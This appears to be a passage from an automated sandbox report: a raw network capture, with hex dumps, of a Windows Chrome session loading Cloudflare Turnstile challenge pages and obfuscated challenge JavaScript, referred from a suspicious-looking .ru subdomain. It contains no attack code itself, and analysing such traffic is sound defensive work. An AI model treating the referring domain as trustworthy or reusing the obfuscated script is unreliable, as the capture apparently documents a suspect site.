                                                                        2025-01-16 08:20:19 UTC798OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/p7h9d/0x4AAAAAAA5D2nHjAPlCZ2mF/auto/fbE/normal/auto/ HTTP/1.1
                                                                        Host: challenges.cloudflare.com
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Upgrade-Insecure-Requests: 1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Sec-Fetch-Site: cross-site
                                                                        Sec-Fetch-Mode: navigate
                                                                        Sec-Fetch-Dest: iframe
                                                                        Referer: https://56.hanagibenewe.ru/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:19 UTC1362INHTTP/1.1 200 OK
                                                                        Date: Thu, 16 Jan 2025 08:20:19 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Content-Length: 26656
                                                                        Connection: close
                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                        content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                        cross-origin-embedder-policy: require-corp
                                                                        cross-origin-opener-policy: same-origin
                                                                        cross-origin-resource-policy: cross-origin
                                                                        origin-agent-cluster: ?1
                                                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                        critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                        referrer-policy: same-origin
                                                                        document-policy: js-profiling
                                                                        2025-01-16 08:20:19 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 32 63 61 66 38 34 30 65 61 61 37 63 65 38 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                        Data Ascii: Server: cloudflareCF-RAY: 902caf840eaa7ce8-EWRalt-svc: h3=":443"; ma=86400
                                                                        2025-01-16 08:20:19 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                        Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                        Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                        Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                        Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                        Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                        Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                        Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                        Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.549727104.18.94.414433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:19 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902caf840eaa7ce8&lang=auto HTTP/1.1
                                                                        Host: challenges.cloudflare.com
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: same-origin
                                                                        Sec-Fetch-Mode: no-cors
                                                                        Sec-Fetch-Dest: script
                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/p7h9d/0x4AAAAAAA5D2nHjAPlCZ2mF/auto/fbE/normal/auto/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:19 UTC331INHTTP/1.1 200 OK
                                                                        Date: Thu, 16 Jan 2025 08:20:19 GMT
                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                        Content-Length: 113465
                                                                        Connection: close
                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                        Server: cloudflare
                                                                        CF-RAY: 902caf886a32558a-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-01-16 08:20:19 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 25 32 30 66 65 65 64 62 61 63 6b 25 32 30 72 65 70 6f 72 74 25 32 30 68 61 73 25 32 30 62 65 65 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f
                                                                        Data Ascii: ort_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_failure":"Error","testing_only":"Testing%20o
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 2c 67 35 2c 67 36 2c 67 67 2c 67 72 2c 67 76 2c 67 77 2c 67 44 2c 67 48 2c 65 4f 2c 65 50 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 33 32 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 37 33 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 37 34 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 35 32 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 31 38 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 37 39 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39 37 37 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28
                                                                        Data Ascii: ,g5,g6,gg,gr,gv,gw,gD,gH,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(532))/1*(-parseInt(gI(873))/2)+-parseInt(gI(1574))/3*(-parseInt(gI(952))/4)+parseInt(gI(1718))/5*(parseInt(gI(1579))/6)+parseInt(gI(977))/7*(parseInt(
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 77 28 39 30 38 29 5d 26 26 67 5b 68 77 28 31 34 33 38 29 5d 3f 67 5b 68 77 28 36 35 37 29 5d 5b 68 77 28 39 30 38 29 5d 28 6e 65 77 20 67 5b 28 68 77 28 31 34 33 38 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 68 7a 2c 48 29 7b 66 6f 72 28 68 7a 3d 68 77 2c 47 5b 68 7a 28 31 34 38 38 29 5d 28 29 2c 48 3d 30 3b 6f 5b 68 7a 28 31 34 30 33 29 5d 28 48 2c 47 5b 68 7a 28 31 36 31 33 29 5d 29 3b 47 5b 48 5d 3d 3d 3d 47 5b 6f 5b 68 7a 28 39 36 36 29 5d 28 48 2c 31 29 5d 3f 47 5b 68 7a 28 35 38 35 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 77 28 37 34 34 29 5d 5b 68 77 28 31 34 38 33 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b
                                                                        Data Ascii: w(908)]&&g[hw(1438)]?g[hw(657)][hw(908)](new g[(hw(1438))](x)):function(G,hz,H){for(hz=hw,G[hz(1488)](),H=0;o[hz(1403)](H,G[hz(1613)]);G[H]===G[o[hz(966)](H,1)]?G[hz(585)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[hw(744)][hw(1483)](B),C=0;C<x[
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 73 29 7b 72 65 74 75 72 6e 27 6f 2e 27 2b 73 7d 29 7d 2c 65 4d 5b 67 4a 28 31 35 33 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 42 2c 64 2c 65 2c 66 2c 67 29 7b 68 42 3d 67 4a 2c 64 3d 7b 7d 2c 64 5b 68 42 28 35 30 32 29 5d 3d 68 42 28 31 34 39 31 29 2c 64 5b 68 42 28 37 31 32 29 5d 3d 68 42 28 39 33 37 29 2c 64 5b 68 42 28 31 31 39 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 65 3d 64 2c 66 3d 31 2c 67 3d 65 5b 68 42 28 31 31 39 35 29 5d 28 31 65 33 2c 65 4d 5b 68 42 28 37 38 39 29 5d 5b 68 42 28 31 37 34 31 29 5d 28 32 3c 3c 66 2c 33 32 29 29 2c 65 4d 5b 68 42 28 31 34 34 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 43 29 7b 68 43 3d 68 42 2c 65 4d 5b 68 43 28 31 34 39 31 29 5d 26 26 28 65 4d 5b 68 43 28 37 30 38
                                                                        Data Ascii: s){return'o.'+s})},eM[gJ(1536)]=function(hB,d,e,f,g){hB=gJ,d={},d[hB(502)]=hB(1491),d[hB(712)]=hB(937),d[hB(1195)]=function(h,i){return i*h},e=d,f=1,g=e[hB(1195)](1e3,eM[hB(789)][hB(1741)](2<<f,32)),eM[hB(1442)](function(hC){hC=hB,eM[hC(1491)]&&(eM[hC(708
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 31 33 32 37 29 5d 3f 69 5b 68 44 28 31 32 35 35 29 5d 28 69 5b 68 44 28 31 32 35 35 29 5d 28 27 68 2f 27 2c 65 4d 5b 68 44 28 38 37 32 29 5d 5b 68 44 28 31 33 32 37 29 5d 29 2c 27 2f 27 29 3a 27 27 2c 6d 3d 69 5b 68 44 28 31 32 35 35 29 5d 28 69 5b 68 44 28 31 32 35 35 29 5d 28 69 5b 68 44 28 31 32 35 35 29 5d 28 69 5b 68 44 28 31 32 35 35 29 5d 28 69 5b 68 44 28 31 32 35 35 29 5d 28 69 5b 68 44 28 31 32 35 35 29 5d 28 69 5b 68 44 28 31 31 30 32 29 5d 2b 6c 2c 69 5b 68 44 28 31 34 34 36 29 5d 29 2b 31 2c 68 44 28 31 30 37 33 29 29 2c 65 4d 5b 68 44 28 38 37 32 29 5d 5b 68 44 28 35 36 38 29 5d 29 2c 27 2f 27 29 2c 65 4d 5b 68 44 28 38 37 32 29 5d 2e 63 48 29 2b 27 2f 27 2c 65 4d 5b 68 44 28 38 37 32 29 5d 5b 68 44 28 34 33 37 29 5d 29 2c 6e 3d 7b 7d 2c 6e
                                                                        Data Ascii: 1327)]?i[hD(1255)](i[hD(1255)]('h/',eM[hD(872)][hD(1327)]),'/'):'',m=i[hD(1255)](i[hD(1255)](i[hD(1255)](i[hD(1255)](i[hD(1255)](i[hD(1255)](i[hD(1102)]+l,i[hD(1446)])+1,hD(1073)),eM[hD(872)][hD(568)]),'/'),eM[hD(872)].cH)+'/',eM[hD(872)][hD(437)]),n={},n
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 65 5b 68 47 28 31 34 30 35 29 5d 28 29 2c 6d 3d 6b 5b 68 47 28 39 32 36 29 5d 2c 6c 5b 68 47 28 38 33 35 29 5d 28 6d 29 3e 2d 31 29 3f 65 4d 5b 68 47 28 31 34 34 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 48 29 7b 68 48 3d 68 47 2c 65 4d 5b 68 48 28 31 35 33 36 29 5d 28 29 7d 2c 31 65 33 29 3a 28 6e 3d 7b 7d 2c 6e 5b 68 47 28 31 37 35 30 29 5d 3d 65 2c 6e 5b 68 47 28 39 30 37 29 5d 3d 66 2c 6e 5b 68 47 28 37 32 32 29 5d 3d 67 2c 6e 5b 68 47 28 39 36 31 29 5d 3d 68 2c 6e 5b 68 47 28 31 33 33 32 29 5d 3d 69 2c 6f 3d 6e 2c 65 4d 5b 68 47 28 31 34 34 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 49 29 7b 68 49 3d 68 47 2c 68 49 28 31 35 30 31 29 21 3d 3d 6b 5b 68 49 28 31 30 39 35 29 5d 3f 66 5b 68 49 28 31 34 38 33 29 5d 28 67 29 28 68 2e 6a 29 3a 65 4d 5b 68 49
